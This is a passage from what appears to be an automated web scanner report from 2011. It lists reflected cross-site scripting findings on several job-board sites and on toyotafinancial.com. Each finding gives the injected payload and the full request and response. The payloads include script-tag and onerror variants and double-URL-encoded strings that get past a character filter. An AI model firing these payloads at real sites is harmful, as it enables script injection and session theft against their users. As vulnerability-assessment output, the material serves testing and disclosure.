Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9of761brn29jbgj1khe0hgrsv7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 99732

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.teenagercrossing.com/?d8279"><script>alert(1)</script>68ad5a2e707=1">
...[SNIP]...

3.116. http://www.telecomcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.telecomcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c307"><script>alert(1)</script>2b1c4b9d948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8c307"><script>alert(1)</script>2b1c4b9d948=1 HTTP/1.1
Host: www.telecomcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=hkpor3jiobjf8rtm3qkl9ivgi5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:04 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:04 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111870

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.telecomcrossing.com/?8c307"><script>alert(1)</script>2b1c4b9d948=1">
...[SNIP]...

3.117. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.toyotafinancial.com
Path:	/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8452f<img%20src%3da%20onerror%3dalert(1)>f19e8466b3e was submitted in the REST URL parameter 3. This input was echoed as 8452f<img src=a onerror=alert(1)>f19e8466b3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /consumer/ShowBinary/BEA%20Repository8452f<img%20src%3da%20onerror%3dalert(1)>f19e8466b3e/tfs/en_US/video/content/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:27:52 GMT
Content-length: 235
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Error authenticating to repository: BEA Repository8452f<img src=a onerror=alert(1)>f19e8466b3e
<p>
...[SNIP]...

3.118. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.toyotafinancial.com
Path:	/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9f005%253cscript%253ealert%25281%2529%253c%252fscript%253ef87a8930f75 was submitted in the REST URL parameter 4. This input was echoed as 9f005<script>alert(1)</script>f87a8930f75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs9f005%253cscript%253ealert%25281%2529%253c%252fscript%253ef87a8930f75/en_US/video/content/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:27:53 GMT
Content-length: 237
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs9f005<script>alert(1)</script>f87a8930f75/en_US/video/content/data.xml does not exist.
<p>
...[SNIP]...

3.119. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.toyotafinancial.com
Path:	/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b750d%253cscript%253ealert%25281%2529%253c%252fscript%253e07d5c9ab6aa was submitted in the REST URL parameter 5. This input was echoed as b750d<script>alert(1)</script>07d5c9ab6aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs/en_USb750d%253cscript%253ealert%25281%2529%253c%252fscript%253e07d5c9ab6aa/video/content/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:27:58 GMT
Content-length: 237
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs/en_USb750d<script>alert(1)</script>07d5c9ab6aa/video/content/data.xml does not exist.
<p>
...[SNIP]...

3.120. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.toyotafinancial.com
Path:	/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f2843%253cscript%253ealert%25281%2529%253c%252fscript%253e33046238f3 was submitted in the REST URL parameter 6. This input was echoed as f2843<script>alert(1)</script>33046238f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs/en_US/videof2843%253cscript%253ealert%25281%2529%253c%252fscript%253e33046238f3/content/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:28:00 GMT
Content-length: 236
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs/en_US/videof2843<script>alert(1)</script>33046238f3/content/data.xml does not exist.
<p>
...[SNIP]...

3.121. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.toyotafinancial.com
Path:	/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload ce625%253cscript%253ealert%25281%2529%253c%252fscript%253e47ad2d14cf9 was submitted in the REST URL parameter 7. This input was echoed as ce625<script>alert(1)</script>47ad2d14cf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/contentce625%253cscript%253ealert%25281%2529%253c%252fscript%253e47ad2d14cf9/data.xml HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:28:01 GMT
Content-length: 237
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs/en_US/video/contentce625<script>alert(1)</script>47ad2d14cf9/data.xml does not exist.
<p>
...[SNIP]...

3.122. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.toyotafinancial.com
Path:	/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload b1c4e%253cscript%253ealert%25281%2529%253c%252fscript%253ef7fa252dbe5 was submitted in the REST URL parameter 8. This input was echoed as b1c4e<script>alert(1)</script>f7fa252dbe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 8 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xmlb1c4e%253cscript%253ealert%25281%2529%253c%252fscript%253ef7fa252dbe5 HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:28:03 GMT
Content-length: 237
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs/en_US/video/content/data.xmlb1c4e<script>alert(1)</script>f7fa252dbe5 does not exist.
<p>
...[SNIP]...

3.123. http://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.toyotafinancial.com
Path:	/consumer/tfs.portal

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c74b"%3balert(1)//3b7137a4f55 was submitted in the _pageLabel parameter. This input was echoed as 6c74b";alert(1)//3b7137a4f55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimator6c74b"%3balert(1)//3b7137a4f55 HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:17 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: ofsc=nGJrN5JZyqT9YnTWFjkvPwPqhThFY4Gb0TLnh2LvngkM1Jk6CQzB!2083777476!658673615; path=/
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>

<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
() {
//alert("openIntermediateMessageWindowTAM");

var requestURI = window.location.href;
var paramname='http://www.ToyotaThanksAMillion.com';
var from = "pg_ForwardEstimator6c74b";alert(1)//3b7137a4f55"

var URL = '/consumer/jsp/tfs/content/tfsTAMCampaignInterstitial.jsp?paramname='+paramname+'&from='+from;
var wid = screen.availWidth;
var hei = screen.availHeight;

if
...[SNIP]...

3.124. http://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.toyotafinancial.com
Path:	/consumer/tfs.portal

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1488'%3balert(1)//69259ebce5f was submitted in the _pageLabel parameter. This input was echoed as e1488';alert(1)//69259ebce5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimatore1488'%3balert(1)//69259ebce5f HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:19 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: ofsc=slvdN5JblW6q2TLn6GkBZpfndTvp6bvhGvGbjfsWnGQXhqtdFZQL!2083777476!658673615; path=/
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>

<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
ion = 8;
// Minor version of Flash required
var requiredMinorVersion = 0;
// Minor version of Flash required
var requiredRevision = 0;

var pageLabel ='pg_ForwardEstimatore1488';alert(1)//69259ebce5f';

var hasReqestedVersion = false;
hasReqestedVersion = DetectFlashVer(requiredMajorVersion, requiredMinorVersion, requiredRevision);
//alert('hasReqestedVersion:'+hasReqestedVersi
...[SNIP]...

3.125. https://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.toyotafinancial.com
Path:	/consumer/tfs.portal

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 693dd"%3balert(1)//8bcb3a6d34b was submitted in the _pageLabel parameter. This input was echoed as 693dd";alert(1)//8bcb3a6d34b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ResourceCenterHome693dd"%3balert(1)//8bcb3a6d34b&_nfls=true&referrer=TYT HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; ofsc=FTJHN5JcXX4n9z4wyQc0l1bTdQq7f3Xm1tqdryTQ8yDpFTxTGZvx!658673615!1980963653; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]; s_sq=undefinedtoJSONString%2CtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString;

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:55:27 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>

<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
{
//alert("openIntermediateMessageWindowTAM");

var requestURI = window.location.href;
var paramname='http://www.ToyotaThanksAMillion.com';
var from = "pg_ResourceCenterHome693dd";alert(1)//8bcb3a6d34b"

var URL = '/consumer/jsp/tfs/content/tfsTAMCampaignInterstitial.jsp?paramname='+paramname+'&from='+from;
var wid = screen.availWidth;
var hei = screen.availHeight;

if
...[SNIP]...

3.126. https://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.toyotafinancial.com
Path:	/consumer/tfs.portal

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da0ab'%3balert(1)//9dd97cb4a8 was submitted in the _pageLabel parameter. This input was echoed as da0ab';alert(1)//9dd97cb4a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ResourceCenterHomeda0ab'%3balert(1)//9dd97cb4a8&_nfls=true&referrer=TYT HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; ofsc=FTJHN5JcXX4n9z4wyQc0l1bTdQq7f3Xm1tqdryTQ8yDpFTxTGZvx!658673615!1980963653; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]; s_sq=undefinedtoJSONString%2CtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString;

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:55:32 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>

<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
n = 8;
// Minor version of Flash required
var requiredMinorVersion = 0;
// Minor version of Flash required
var requiredRevision = 0;

var pageLabel ='pg_ResourceCenterHomeda0ab';alert(1)//9dd97cb4a8';

var hasReqestedVersion = false;
hasReqestedVersion = DetectFlashVer(requiredMajorVersion, requiredMinorVersion, requiredRevision);
//alert('hasReqestedVersion:'+hasReqestedVersi
...[SNIP]...

3.127. http://www.tradingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tradingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f33a8"><script>alert(1)</script>dcf38b67f33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f33a8"><script>alert(1)</script>dcf38b67f33=1 HTTP/1.1
Host: www.tradingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9bdnnh8975tie73op81om9iv23; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97304

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.tradingcrossing.com/?f33a8"><script>alert(1)</script>dcf38b67f33=1">
...[SNIP]...

3.128. http://www.trainingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trainingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77df3"><script>alert(1)</script>601a884eba3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?77df3"><script>alert(1)</script>601a884eba3=1 HTTP/1.1
Host: www.trainingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:49 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nums7dcc1j6lqi6c182hojl957; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:49 GMT
